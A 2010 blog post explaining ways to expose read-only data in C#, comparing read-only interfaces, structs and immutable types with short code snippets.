(for a larger discussion of const versus readonly, see here). That is, the reference is readonly, but what it refers to is not. So if you had: 1: public Sender 2: { 3: private readonly List<string> _hosts; 4: This prevents you from saying: 1: // cannot change what we refer to, _hosts is readonly. 2: _hosts = new List<string>(); But you can mutate the existing list: 1: // can do this, we aren't changing the reference (which is readonly) 2: _hosts.Clear(); This can lead to confusion for the novice developer. To be fair, though, I can totally see why C# (and Java) took this route, because C++ const-correctness can be extremely maddening. Essentially, as mentioned before, you have to mark every method as to whether or not it will mutate the class. So what are we to do if we want to present truly read-only data? Well, you have several options, none of these are perfect, in any sense, but any of them will give you a reasonable level of read-only protection. One of the things you can do to make a type harder to modify is have it present a read-only interface. Note that I’m not talking about the readonly keyword, but an interface that only exposes non-mutable operations. For example, let’s say you had a POCO like Product: 1: public class Product 3: public string Name { get; set; } 4: public int Id { get; set; } 5: public string Category { get; set; } Any time an instance of this class is exposed, the members can be altered. Thus even if you had: 1: public class CatalogEntry 3: private readonly Product _product; 4: private readonly double _price; 5: 6: // incidentally we could have done this with a private setter 7: // instead of backing field, but wanted to illustrate using readonly 8: public Product Product { get { return _product; } } 9: public double Price { get { return _price; } } 11: public CatalogEntry(Product product, double price) 12: { 13: _product = product; 14: _price = price; 15: } 16: } There’s nothing to stop you from saying: 1: var entry = new CatalogEntry(new Product { Id = 3, Name = "Widget", Category = "Theoretical" }, 3.14); 2: 3: // allowed, _product is readonly, but _product.Name is not! 4: entry.Product.Name = "Ooops"; So how can we mitigate this? Well, we could provide a read-only interface for our product such as: 1: // create an interface without mutators. 2: public interface IReadOnlyProduct 4: public string Name { get; } 5: public int Id { get; } 6: public string Category { get; } 7: } 8: 9: // POCO class implements the read-only interface and adds mutators 10: public class Product : IReadOnlyProduct 11: { 12: public string Name { get; set; } 13: public int Id { get; set; } 14: public string Category { get; set; } 15: } Now, with this read-only interface, we can make classes that want to use product but keep it from being altered expose only the IReadOnlyProduct interface. 8: public IReadOnlyProduct Product { get { return _product; } } Now, if you attempt to directly modify Product, you will get a syntax error because there are no setters exposed. 3: // Now, this is a compiler error because IReadOnlyProduct does not expose a Name setter. So is this perfect? Not really. The main problems this approach has is that you have to create read-only interfaces for everything you want to protect, and there’s nothing that prevents a user of your class from directly casting it back to Product and then modifying the values. As such, it’s probably not the best approach. One of the other options we have is to make the type a struct. Remember that struct types are value types and thus any time you pass them around (which includes returning them from property gets) you pass them by value, which makes a full copy. Since you are passing a copy, if the user chooses to modify the copy that is their business, but it will not affect your copy. 1: // now makes a struct, type is now pass-by-value. 2: public struct Product 4: public string Name { get; set; } 5: public int Id { get; set; } 6: public string Category { get; set; } Now with our CatalogEntry, we have: 3: // making private setters to illustrate can do either way 4: public Product Product { get; private set; } 5: public double Price { get; private set; } 7: public CatalogEntry(Product product, double price) 8: { 9: Product = product; 10: Price = price; 11: } 12: } Now, if we attempt to alter the Product returned: 1: var entry = new CatalogEntry(new Product {Id = 3, Name = "Widget", Category = "Theoretical"}, 3.14); 3: // compiler gives us an error saying cannot set Product Name because "not a variable". We get a nice compiler error saying we can’t modify the Product Name field because the Product is returned by value and is a local copy which cannot be modified. Now, you can do this: 3: // you can do this... 4: var product = entry.Product; 6: // but you're modifying a copy and it doesn't affect original. 7: product.Name = "Ooops"; But this is rather benign because you at that point product is a copy of entry’s Product and thus the original is unaltered. So, a struct gives you a bit better of protection, but it’s not a panacea. The thing to remember is that struct is not class and there are major differences between the two (I have an entry with a table of differences here). One of the major points being it is always passed by value, which can be heavy if your type has more than a few properties. Also, this method does not protect you if you are exposing a mutable reference type as a property inside the struct. This is because the copy of the struct is shallow, only the reference is copied and not what it refers to. This is fine for immutable types (like string), but if you expose a mutable reference type, that can still be changed. One of the ways you can also create a read-only type is to make the type immutable. That is, once the type has received its initial value, it cannot be changed. In C#, strings (among others) are immutable. Any operation you perform that would change the string actually returns a new string instead. This method can be used either in plus of using struct or in addition to it. So, how do you create an immutable type? Basically you would take in all the information necessary in the constructor of the type, and then only expose non-mutating methods and property gets: 3: // all properties have private sets so only the class itself can change them. 4: public string Name { get; private set; } 5: public int Id { get; private set; } 6: public string Category { get; private set; } 7: 8: // constructor takes (or calculates) all it needs and sets 9: public Product(int id, string name, string category) 10: { 11: Id = id; 12: Name = name; 13: Category = category; 14: } So now, using the same CatalogEntry as before, we would have: 1: var entry = new CatalogEntry(new Product(3, "Widget", "Theoretical"), 3.14); 3: // can't do this, Name doesn't have get exposed. Notice, this seems very similar to exposing a read-only interface. The difference being that this cannot be cast to anything to get at the private members. Since the type itself protects the sets, they cannot be accessed and you will get a compiler error. So what’s the down-side to this? Well, you have to specify pretty much everything in the constructor, so if your class contains a lot of properties, you can have a very messy constructor. Plus, because we have to pass all values in the constructor, we can’t use object initializers for the properties. To me this makes the code less readable. For example, in the code snippet above is “Widget” the name, or the category? Same with “Theoretical”? You can get around this by using named parameters in C#. C# named parameters allow you to pass a parameter by its name instead of by position. Now, that’s not to say you can’t put a parameter in the right position and name it either, but it does allow that flexibility. The nice part of this is you can use it to remove ambiguity: 1: var entry = new CatalogEntry(new Product(3, name: "Widget", category: "Theoretical"), 3.14); Is it perfect? No, but often times an immutable type can be your best protection. So, we’ve seen three of several ways to create read-only data in C#. They all have their pros and cons and some may be more applicable in some situations than others. In summary: Until C# gives us a way to return a constant form of a mutable reference type, these are a few of the tools at our disposal. Print | posted on Thursday, October 28, 2010 6:21 PM | Filed Under [ My Blog C# Software .NET Fundamentals ]
http://geekswithblogs.net/BlackRabbitCoder/archive/2010/10/28/c.net-fundamentals-how-to-return-read-only-data.aspx
CC-MAIN-2019-47
refinedweb
1,931
58.92
First, output data Celsius temperature values and displayed, it is still easy to use, It effectively, thereby widely used in gardening, home alarm systems and other devices. Second, the use; Up to this point generally know how to use it, then we need to know about how it is the next temperature measurement? We must have the above things can test to see if an original is a simple thermal how to help us measure the temperature. Arduino pin analoog A5 --> module S (Signal) Arduino pin GND - module - Arduino pin 5+ --> middel pin 5V This code don’t give the right values, in a room that was kind of ok it gave a tempature of 10 C. That isn’t right so the calculation in the code should be checked. #include <math.h> int sensorPin = A5; // select the input pin for the potentiometer double Thermistor(int RawADC) { double Temp; Temp = log(10000.0*((1024.0/RawADC-1))); Temp = 1 / (0.001129148 + (0.000234125 + (0.0000000876741 * Temp * Temp ))* Temp ); Temp = Temp - 273.15; // Convert Kelvin to Celcius //Temp = (Temp * 9.0)/ 5.0 + 32.0; // Convert Celcius to Fahrenheit return Temp; } void setup() { Serial.begin(9600); } void loop() { int readVal=analogRead(sensorPin); double temp = Thermistor(readVal); Serial.println(temp); // display tempature //Serial.println(readVal); // display tempature delay(500); }
https://arduino.tkkrlab.nl/sensoren/ky-013/
CC-MAIN-2021-21
refinedweb
217
65.12
Validate Email Workflows with a Serverless Inbox API29 Sep 2020 In this article you’ll learn how to build a serverless API that you can use to validate your email sending workflows. You will have access to unlimited inboxes for your domain, allowing you to use a new inbox for every test run. The working code is ready for you to deploy on GitHub. With AWS services Simple Email Service (SES) and API Gateway we can build a fully automated solution. Its pricing model fits most testing workloads into the free tier, and can handle up to 10,000 mails per month for just $10. No maintenance or development required. It also allows you to stay in the SES sandbox. Prerequisites To deploy this solution, you should have an AWS account and some experience with the AWS CDK. I’ll be using the TypeScript variant. This article uses CDK version 1.63.0. Let me know if anything breaks in newer versions! To receive mail with SES you need a domain or subdomain. You can register a domain with Route53 or delegate from another provider. You can also use subdomains like mail-test.bahr.dev to receive mail if you already connected your apex domain (e.g. bahr.dev) with another mailserver. High-Level Overview The solution consists of two parts. The email receiver and the api that lets you access the received mail. The first writes to the database, the latter reads from it. For the email receiver we use SES with Receipt Rules. We use those rules to store the raw payload and attachments in an S3 bucket, and send a nicely formed payload to a Lambda function which creates an entry in the DynamoDB table. On the API side there’s a single read operation which requires the recipient’s email address. It can be parameterized to reduce the number of emails that will be returned. Old emails are automatically discarded with DynamoDB’s time to live (TTL) feature, keeping the database small without any maintenance work. Verify Domain with SES To receive mail, you must be in control of a domain that you can register with SES. This can also be a subdomain, e.g. if you already use your apex domain (e.g. bahr.dev) for another mailservice like Office 365. The integration with SES is easiest if you have a hosted zone for your domain in Route53. To use domains from another provider like GoDaddy, I suggest that you set up a nameserver delegation. Once you have a hosted zone for your domain, go to the Domain Identity Management in SES and verify a new domain. There’s also a short video where I verify a domain with SES. Data Model We’ll use DynamoDB’s partition and sort keys to enable two major features: Receiving mail for many aliases and receiving more than one mail for each alias. An alias is the front-part in front-part@domain.com. partition_key: recipient@address.com sort_key: timestamp#uuid ttl: timestamp By combining a timestamp and a uuid we can sort and filter by the timestamp, while also guaranteeing that no two records will conflict with each other. The TTL helps us to keep the table small, by letting DynamoDB remove old records. I’m using Jeremy Daly’s dynamodb-toolbox to model my database entities. import { Table, Entity } from 'dynamodb-toolbox'; import { v4 as uuid } from 'uuid'; // Require AWS SDK and instantiate DocumentClient import * as DynamoDB from 'aws-sdk/clients/dynamodb'; const DocumentClient = new DynamoDB.DocumentClient(); // Instantiate a table export const MailTable = new Table({ // Specify table name (used by DynamoDB) name: process.env.TABLE, // Define partition and sort keys partitionKey: 'pk', sortKey: 'sk', // Add the DocumentClient DocumentClient }); export const Mail = new Entity({ name: 'Mail', attributes: { id: { partitionKey: true }, // recipient address sk: { hidden: true, sortKey: true, default: (data: any) => `${data.timestamp}#${uuid()}` }, timestamp: { type: 'string' }, from: { type: 'string' }, to: { type: 'string' }, subject: { type: 'string' }, ttl: { type: 'number' }, }, table: MailTable }); The Receiver SES allows us to set up ReceiptRules which trigger actions when a new mail arrives. There are multiple actions to choose from but we are mostly interested in the Lambda and S3 actions. We use the Lambda action to store details like the recipient, the sender and the subject in a DynamoDB table. With the S3 action we get the raw email deliverd as a file into a bucket. This will be handy to later support more use cases like rerturning the mail’s body and attachments. Below you can see the abbreviated CDK code to set up the ReceiptRules. Please note that you have to activate the rule set in the AWS console. There is currently no high level CDK construct for this and I don’t want you to accidentally override an existing rule set. Here’s a short video where I activate a rule set. import * as cdk from '@aws-cdk/core'; import { Bucket } from '@aws-cdk/aws-s3'; import { Table } from '@aws-cdk/aws-dynamodb'; import { Function } from '@aws-cdk/aws-lambda'; import { ReceiptRuleSet } from '@aws-cdk/aws-ses'; import * as actions from '@aws-cdk/aws-ses-actions'; export class InboxApiStack extends cdk.Stack { constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) { super(scope, id, props); // your-domain.com const domain = process.env.INBOX_DOMAIN; const rawMailBucket = new Bucket(this, 'RawMail'); const table = new Table(this, 'TempMailMetadata', { ... }); const postProcessFunction = new Function(this, 'PostProcessor', { ... environment: { 'TABLE': table.tableName, } }); table.grantWriteData(postProcessFunction); // after deploying the cdk stack you need to activate this ruleset new ReceiptRuleSet(this, 'ReceiverRuleSet', { rules: [ { recipients: [domain], actions: [ new actions.S3({ bucket: rawMailBucket }), new actions.Lambda({ function: postProcessFunction }) ], } ] }); } } With the above CDK code in place, let’s take a look at the Lambda function that is triggered when a new mail arrives. import { SESHandler } from 'aws-lambda'; // the model uses dynamodb-toolbox import { Mail } from './model'; export const handler: SESHandler = async(event) => { for (const record of event.Records) { const mail = record.ses.mail; const from = mail.source; const subject = mail.commonHeaders.subject; const timestamp = mail.timestamp; const now = new Date(); // set the ttl as 7 days into the future and // strip milliseconds (ddb expects seconds for the ttl) const ttl = now.setDate(now.getDate() + 7) / 1000; for (const to of mail.destination) { await Mail.put({ id: to, timestamp, from, to, subject, ttl }); } } } The function above maps the SES event into one record per recipient and store them together with a TTL attribute in the database. You can find the full source code on GitHub. Now that we receive mail directly into our database, let’s build an API to access the mail. The Read API The Read API consists of an API Gateway and a Lambda function with read access to the DynamoDB table. If you haven’t built such an API before, I recommend that you check out Marcia’s video on how to build serverless APIs. Below you can see the abbreviated CDK code to set up the API Gateway and Lambda function. You can find the full source code on GitHub. import * as cdk from '@aws-cdk/core'; import { LambdaRestApi } from '@aws-cdk/aws-apigateway'; import { Table } from '@aws-cdk/aws-dynamodb'; export class InboxApiStack extends cdk.Stack { constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) { super(scope, id, props); const table = new Table(this, 'TempMailMetadata', { ... }); const apiFunction = new Function(this, 'ApiLambda', { environment: { 'TABLE': table.tableName, } }); table.grantReadData(apiFunction); new LambdaRestApi(this, 'InboxApi', { handler: apiFunction, }); } } API Gateway is able to directly integrate with DynamoDB, but to continue using the database model I built with dynamodb-toolbox I have to go through a Lambda function. I also feel more comfortable writing TypeScript than Apache Velocity Templates. With the lambda function below, we load mails for a particular recipient and can filter to only return mails that arrived after a given timestamp. import { APIGatewayProxyHandler } from 'aws-lambda'; // the model uses dynamodb-toolbox import { Mail } from './model'; export const handler: APIGatewayProxyHandler = async(event) => { const queryParams = event.queryStringParameters; const recipient = queryParams?.recipient; if (!recipient) { return { statusCode: 400, body: 'Missing query parameter: recipient' } } const since = queryParams.since || ''; const limit = +queryParams.limit || 1; const mails = (await Mail.query( recipient, { beginsWith: since, limit, } )).Items; return { statusCode: 200, body: JSON.stringify(mails) } } After deploying the read API, you can run a GET request which includes the recipient mail as the recipient query parameter. You can further tweak your calls by providing a since timestamp or a limit that is great than the default 1. For example if you are sending an order confirmation to random-uuid@inbox-api.domain.com, then you need to run GET request against. Limitations and Potential Improvements While the SES sandbox restricts how many emails you can send, there seems to be no limiation about receiving mail. Our solution is not yet capable of providing attachments or the mail body. The SES S3 action already stores those in a bucket which can be used for an improved read API function. We could also drop the Lambda function that ties together the API Gateway and DynamoDB, by replacing it with a direct integration between the two services. Try it Yourself Check out the source code on GitHub. There’s a step by step guide for you to try out this solution. Do you need help? Send me a message on Twitter or via mail! Further Reading - Source code on GitHub - Receipt Rules - Test email edge cases with the AWS mailbox simulator - DynamoDB TTL Enjoyed this article? I publish a new article every month. Connect with me on Twitter and sign up for new articles to your inbox!
https://bahr.dev/2020/09/29/validate-email-workflows/
CC-MAIN-2020-50
refinedweb
1,597
57.57
Ads Hi, here is my code: package project1; public class dddddddddd { public static void main(String[] args) { System.out.println("dddddddddddddddd"); } } but output is as follows: run: java.lang.NoSuchMethodError: main Exception in thread "main" Java Result: 1 BUILD SUCCESSFUL (total time: 0 seconds) please help me on this.. Thanks in Advance. I checked your code on eclipse ide..there will be no problem in executing this code. But if you are executing it using command prompt(CMD), you need to first compile it inside project1 folder as : ...\project1>javac dddddddddd.java then you need to run it as : java project1.dddddddddd Hope this will solve your problem. ya.. thanks a lot.... great absevation..
http://www.roseindia.net/answers/viewqa/Java-Beginners/17806-JAVA.html
CC-MAIN-2017-34
refinedweb
114
61.02